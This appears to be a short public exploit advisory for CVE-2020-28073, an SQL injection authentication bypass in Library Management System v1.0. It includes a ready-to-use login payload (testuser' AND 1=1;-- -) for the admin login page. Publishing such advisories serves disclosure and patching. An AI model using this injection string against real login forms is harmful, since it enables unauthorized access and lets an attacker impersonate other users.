Library Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
d7ff94cb2599800fc55221f73773e40c3d163b7d02b6cbae712597111cc16af6
# Exploit Title: Authentication Bypass via SQL injection on Library Management System
# Date: 23/10/2020
# Exploit Author: Valerio Alessandroni
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-f ull-source-code-2020.html
# Version: 1.0
# Tested on: ubuntu 18.04
# CVE : CVE-2020-28073
# Description:
SQL injection on Library Management System v1.0 allows a potentially attacker to bypass the user authentication and impersonificate every user on the system.
# Reproduction:
- Go to login page (https://127.0.0.1/Library/Admin/adminlogin.php) and try to bypass login.
username: testuser' AND 1=1;-- - password: RandomlyText